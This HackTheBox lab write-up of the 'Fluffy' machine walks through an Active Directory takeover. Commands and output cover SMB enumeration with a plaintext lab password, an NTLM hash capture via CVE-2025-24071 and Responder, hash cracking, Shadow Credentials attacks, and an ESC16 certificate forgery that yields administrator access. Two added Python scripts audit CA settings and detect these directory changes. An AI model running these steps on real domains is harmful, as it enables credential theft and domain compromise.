Introduction
This article is a write-up of a HackTheBox machine.
The machine is Fluffy.
Fluffy covers enumeration and Active Directory Certificate Services.
Scanning
First, run a port scan.
Below, the port scan is run through a shell script prepared in advance.
##################
# Port scan tool #
##################
*Detailed scan :1
*Full scan :2
***Select scanning method by number***
1
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 22:17 JST
Nmap scan report for fluffy.htb (10.10.11.69)
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-17 20:17:47Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-06-17T20:19:20+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-06-17T20:19:19+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-17T20:19:20+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-06-17T20:19:19+00:00; +7h00m01s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49753/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time:
| date: 2025-06-17T20:18:42
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.45 seconds
Scan completed
We investigate based on the results of the port scan above.
Enumeration
The port scan results show that the OS is Windows and that Active Directory is running.
From here on we focus on Active Directory and enumerate using the account credentials that were provided.
SMB
Run the following command to check for public shares.
$ smbclient -L //10.10.11.69 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.69 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The listing above reveals an interesting share, so we run smbmap to check its permissions. (The credentials used are the ones provided in advance.)
$ smbmap -H 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.11.69:445 Name: fluffy.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ, WRITE
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
Read and write permissions on the IT share are confirmed. We access the IT share.
$ smbclient //10.10.11.69/IT -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 18 05:20:42 2025
.. D 0 Wed Jun 18 05:20:42 2025
.library-ms A 0 Tue Jun 17 23:52:28 2025
CVE-2025-24071_PoCpoc.py A 0 Wed Jun 18 00:11:49 2025
Everything-1.4.1.1026.x64 D 0 Sat Apr 19 00:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Sat Apr 19 00:04:05 2025
KeePass-2.58 D 0 Sat Apr 19 00:08:38 2025
KeePass-2.58.zip A 3225346 Sat Apr 19 00:03:17 2025
poc.py A 1003 Wed Jun 18 00:11:55 2025
Upgrade_Notice.pdf A 169963 Sat May 17 23:31:07 2025
xd.library-ms N 365 Tue Jun 17 21:39:29 2025
5842943 blocks of size 4096. 1975342 blocks available
Download the Upgrade_Notice.pdf file.
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (88.6 KiloBytes/sec) (average 88.6 KiloBytes/sec)
Reading Upgrade_Notice.pdf, it states that because several high-severity vulnerabilities have been published, all administrators must upgrade all systems in accordance with the internal security policy.
Vulnerability Analysis
Given the PoC file present in the IT share and the write permission on the share, we can infer that CVE-2025-24071 is present here.
CVE-2025-24071 is a vulnerability in which a malicious SMB path is embedded in a .library-ms file inside a ZIP/RAR archive; when Windows Explorer automatically parses the file, the user's NTLM credentials are sent over SMB to an attacker-controlled server.
We use a PoC found on GitHub.
Upload the zip file prepared in advance, then run Responder and watch for connections.
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.4 kb/s) (average 0.4 kb/s)
$ responder -I tun0 -wvF
After a short while, a hash appears.
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:a18b542bd7fabf0a[REDACTED]
Save the hash and crack it with john to recover the password.
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (p.agila)
1g 0:00:00:00 DONE (2025-06-17 22:35) 1.515g/s 6851Kp/s 6851Kc/s 6851KC/s proquis..prison only
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
System Hacking
Using the obtained credentials of the p.agila user, we establish a foothold.
Gaining Access
First, run bloodhound.py to collect all information about the fluffy.htb domain.
$ bloodhound-python -u 'p.agila' -p 'REDACTED' -d fluffy.htb -ns 10.10.11.69 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 48S
INFO: Compressing output into 20250617224035_bloodhound.zip
Start BloodHound, upload the collected zip file, and analyze the AD data.
Under Outbound Object Control, we check the control rights of the p.agila user. We find that p.agila indirectly has full control over Service Accounts.
We also confirm that the Service Accounts group has write permissions over LDAP_SVC, WINRM_SVC and CA_SVC.
WINRM_SVC is a member of the REMOTE MANAGEMENT USERS group.
Run the following command to add the p.agila user to the SERVICE ACCOUNTS group.
$ bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'REDACTED' add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS
Before running the Shadow Credentials attack that follows, synchronize our clock with the target machine to avoid errors caused by clock skew.
$ sudo systemctl stop systemd-timesyncd
$ sudo ntpdate 10.10.11.69
2025-06-18 05:42:51.187948 (+0900) +25200.764221 +/- 0.127682 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25200.764221
Run the following command to perform the Shadow Credentials attack and obtain the NT hash of the winrm_svc user.
$ certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -account 'WINRM_SVC'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f6521ffe-f364-a648-f051-ee0fc8452cbe'
[*] Adding Key Credential with device ID 'f6521ffe-f364-a648-f051-ee0fc8452cbe' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'f6521ffe-f364-a648-f051-ee0fc8452cbe' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': [REDACTED]
Run the following command to get a WinRM shell.
$ evil-winrm -i 10.10.11.69 -u 'winrm_svc' -H '[REDACTED]'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
User Flag
The user flag is found on the Desktop.
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\winrm_svc\desktop> ls
Directory: C:\Users\winrm_svc\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/17/2025 4:01 AM 34 user.txt
Root Flag
For the root flag, we need to exploit a vulnerability in Active Directory Certificate Services.
Run the following command to scan for ADCS vulnerabilities. The hash of the ca_svc user is obtained with certipy-ad in the same way as for winrm_svc.
$ certipy-ad find -username ca_svc -hashes :[REDACTED] -dc-ip 10.10.11.69 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250618054924_Certipy.txt'
[*] Wrote text output to '20250618054924_Certipy.txt'
[*] Saving JSON output to '20250618054924_Certipy.json'
[*] Wrote JSON output to '20250618054924_Certipy.json'
The txt file generated by the command above shows the ESC16 vulnerability.
$ cat 20250618054924_Certipy.txt
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
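The CA-level finding above comes down to one line of the report: the OID 1.3.6.1.4.1.311.25.2 (szOID_NTDS_CA_SECURITY_EXT, the extension that embeds the requester's SID in issued certificates) listed under Disabled Extensions, which is why the later `req` output reports "Certificate has no object SID". As an added example that is not part of the original write-up and not Certipy's own code, the script below parses the Certificate Authorities section of a Certipy text report and flags that condition; it also checks two other CA-level settings visible in the same section (User Specified SAN and Enforce Encryption for Requests), which goes beyond what this machine exposes. The sample report is constructed to mirror the output above.

```python
"""Added example (not from the write-up and not Certipy's own code): parse the
"Certificate Authorities" section of a Certipy `find` text report and flag the
CA-level misconfigurations it exposes.  The report below is constructed to
mirror the one shown above."""
from __future__ import annotations

# szOID_NTDS_CA_SECURITY_EXT: the extension that embeds the requester's SID in
# issued certificates.  Listing it under Disabled Extensions is what Certipy
# reports as ESC16.
SECURITY_EXT_OID = "1.3.6.1.4.1.311.25.2"

SAMPLE_REPORT = """\
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Web Enrollment
      HTTP
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\\Domain Admins
                                          FLUFFY.HTB\\Enterprise Admins
        Enroll                          : FLUFFY.HTB\\Cert Publishers
Certificate Templates                   : [!] Could not find any certificate templates
"""


def parse_cas(report: str) -> dict[str, dict[str, list[str]]]:
    """Return {ca_index: {key: [values...]}} for every CA in the report.

    Lines look like "<indent>Key : Value".  A line without " : " that is
    indented well past the previous key is a continuation value (Certipy
    lists extra principals that way); anything else is a sub-section header.
    """
    cas: dict[str, dict[str, list[str]]] = {}
    current: dict[str, list[str]] | None = None
    last_key: str | None = None
    last_indent = 0
    in_ca_section = False
    for raw in report.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        line = raw.strip()
        if indent == 0:                      # top-level section header
            in_ca_section = line == "Certificate Authorities"
            current = None
            continue
        if not in_ca_section:
            continue
        if indent == 2 and line.isdigit():   # start of the next CA entry
            current = cas.setdefault(line, {})
            last_key = None
            continue
        if current is None:
            continue
        if " : " in line:
            key, value = (part.strip() for part in line.split(" : ", 1))
            current.setdefault(key, []).append(value)
            last_key, last_indent = key, indent
        elif last_key is not None and indent > last_indent + 4:
            current[last_key].append(line)   # continuation of a multi-value key
        else:
            last_key = None                  # sub-section header, e.g. "Permissions"
    return cas


def assess_ca(ca: dict[str, list[str]]) -> list[str]:
    """Map CA settings to the Certipy ESC identifiers they correspond to."""
    findings = []
    if SECURITY_EXT_OID in ca.get("Disabled Extensions", []):
        findings.append("ESC16")   # SID security extension disabled CA-wide
    if ca.get("User Specified SAN") == ["Enabled"]:
        findings.append("ESC6")    # EDITF_ATTRIBUTESUBJECTALTNAME2 set on the CA
    if ca.get("Enforce Encryption for Requests") == ["Disabled"]:
        findings.append("ESC11")   # RPC enrollment accepted without encryption
    return findings


def audit_report(report: str) -> dict[str, list[str]]:
    """{CA name: [ESC findings]} for every CA in a Certipy text report."""
    return {ca.get("CA Name", ["?"])[0]: assess_ca(ca)
            for ca in parse_cas(report).values()}


if __name__ == "__main__":
    for name, escs in audit_report(SAMPLE_REPORT).items():
        print(f"{name}: {', '.join(escs) or 'no CA-level findings'}")
```

Pointing `audit_report` at a real report (`open("20250618054924_Certipy.txt").read()`) gives the same dictionary; the parser keeps the Access Rights lists intact as well, so the same pass can show which principals hold ManageCa and Enroll on the CA.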
Run the following command to read the ca_svc user's attributes.
$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : ca_svc@fluffy.htb
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-06-17T15:17:16+00:00
Run the following command to temporarily change the UPN of the ca_svc user to administrator.
$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
Run the following command to create a credential linked to a certificate, so that we can authenticate as ca_svc with that certificate.
$ certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'dd5c1d04-3ee0-2c6c-ca62-1ec838dcf233'
[*] Adding Key Credential with device ID 'dd5c1d04-3ee0-2c6c-ca62-1ec838dcf233' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'dd5c1d04-3ee0-2c6c-ca62-1ec838dcf233' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': [REDACTED]
Run the following command to export the KRB5CCNAME environment variable.
$ export KRB5CCNAME=ca_svc.ccache
Run the following command to request a certificate from AD CS.
$ certipy-ad req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Run the following command to restore the ca_svc user's UPN.
$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
Run the following command to authenticate as administrator.
$ certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': [REDACTED]
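Both the Shadow Credentials step against winrm_svc and the UPN swap against ca_svc above are LDAP writes to ordinary user objects (msDS-KeyCredentialLink and userPrincipalName), so a domain controller with directory-change auditing enabled records each of them as Security event 5136. As an added detection example that is not part of the original write-up and not shipped by any of the tools used above, the script below works over simplified 5136 records modelled on that sequence: it flags a key credential written by a principal other than the account itself, a UPN that no longer matches the account's sAMAccountName (with extra weight when it collides with a privileged name), and a UPN that is changed and put back within a short window. The records, the watch-list and the DN-to-sAMAccountName map are constructed for this example; only ca_svc's DN is taken from the certipy output above.

```python
"""Added detection example (not from the write-up; none of the tools used above
ship this code).  It flags the directory changes that the Shadow Credentials
and UPN-swap steps above leave behind, working from simplified records of
Windows Security event 5136 ("A directory service object was modified").
Field names follow that event; the records and the DN -> sAMAccountName map
are constructed for this example."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed watch-list of high-value principal names (local part of a UPN).
PRIVILEGED_NAMES = {"administrator"}
# A UPN change that is reverted within this window is reported as a transient swap.
REVERT_WINDOW = timedelta(minutes=30)


@dataclass
class DirChange:
    """Subset of event 5136 fields; one record per attribute value change."""
    time: datetime
    subject: str      # SubjectUserName: the account that made the change
    object_dn: str    # ObjectDN: the object that was modified
    attribute: str    # AttributeLDAPDisplayName
    value: str        # AttributeValue
    op: str           # OperationType: "added" or "deleted"


# Constructed DN -> sAMAccountName map.  ca_svc's DN is the one shown by
# certipy above; the other two CNs are assumptions for this example.
DN_CA = "CN=certificate authority service,CN=Users,DC=fluffy,DC=htb"
DN_WINRM = "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb"
DN_USER = "CN=j.fleischman,CN=Users,DC=fluffy,DC=htb"
ACCOUNTS = {DN_CA: "ca_svc", DN_WINRM: "winrm_svc", DN_USER: "j.fleischman"}


def upn_local_part(upn: str) -> str:
    """'administrator' for both 'administrator' and 'administrator@fluffy.htb'."""
    return upn.split("@", 1)[0].lower()


def detect(events: list[DirChange], accounts: dict[str, str] = ACCOUNTS) -> list[str]:
    """Return human-readable findings for the suspicious patterns in `events`."""
    findings: list[str] = []
    upn_writes: dict[str, list[DirChange]] = {}
    for ev in sorted(events, key=lambda e: e.time):
        if ev.op != "added":
            continue
        sam = accounts.get(ev.object_dn, ev.object_dn).lower()
        if ev.attribute == "userPrincipalName":
            upn_writes.setdefault(ev.object_dn, []).append(ev)
            local = upn_local_part(ev.value)
            if local != sam:   # the UPN no longer names the account that owns it
                reason = ("collides with a privileged account"
                          if local in PRIVILEGED_NAMES else "does not match sAMAccountName")
                findings.append(f"{ev.subject} set UPN of {sam} to '{ev.value}' ({reason})")
        elif ev.attribute == "msDS-KeyCredentialLink" and ev.subject.lower() != sam:
            # Windows Hello enrollment writes the key as the account itself; a
            # different principal writing it is the Shadow Credentials pattern.
            findings.append(f"{ev.subject} added a key credential to {sam} (possible Shadow Credentials)")
    # A UPN changed and then put back within the window is a transient swap.
    for dn, writes in upn_writes.items():
        sam = accounts.get(dn, dn).lower()
        for first, later in zip(writes, writes[1:]):
            delta = later.time - first.time
            if delta <= REVERT_WINDOW and upn_local_part(later.value) == sam:
                findings.append(f"UPN of {sam} was changed to '{first.value}' and restored "
                                f"after {int(delta.total_seconds() // 60)} min")
    return findings


T0 = datetime(2025, 6, 18, 5, 45)
SAMPLE_EVENTS = [   # constructed; mirrors the order of operations in the write-up
    DirChange(T0, "p.agila", DN_WINRM, "msDS-KeyCredentialLink", "<key blob>", "added"),
    DirChange(T0 + timedelta(minutes=5), "p.agila", DN_CA, "userPrincipalName", "administrator", "added"),
    DirChange(T0 + timedelta(minutes=6), "p.agila", DN_CA, "msDS-KeyCredentialLink", "<key blob>", "added"),
    DirChange(T0 + timedelta(minutes=9), "p.agila", DN_CA, "userPrincipalName", "ca_svc@fluffy.htb", "added"),
    # benign control: a user enrolling their own key credential
    DirChange(T0 + timedelta(minutes=20), "j.fleischman", DN_USER, "msDS-KeyCredentialLink", "<key blob>", "added"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Event 5136 is only generated when the "Audit Directory Service Changes" subcategory is enabled and the user objects carry a SACL for write access, so the detector is only as good as that audit configuration. On the CA side, the certificate request itself appears in events 4886 and 4887 on the issuing CA, where the subject name shows the swapped UPN; correlating those with the directory changes above closes the loop.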
Run the following command to get a WinRM shell.
$ evil-winrm -i 10.10.11.69 -u 'administrator' -H [REDACTED]
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
The root flag is found on the Desktop.
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/17/2025 4:01 AM 34 root.txt
Conclusion
When analyzing AD, it is also important to understand how to operate BloodHound.



